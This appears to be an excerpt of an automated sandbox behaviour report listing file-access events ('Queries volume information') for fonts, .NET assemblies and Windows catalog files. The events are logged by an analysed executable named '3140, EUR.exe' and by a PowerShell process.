Source: C:\Users\user\Desktop\3140, EUR.exe	Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Queries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Queries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Queries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Queries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Queries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Queries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Queries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Queries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Queries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Queries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Queries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Queries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Queries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Queries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Queries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Queries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Queries volume information: C:\Windows\Fonts\flat_officeFontsPreview.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Queries volume information: C:\Windows\Fonts\OFFSYMXL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
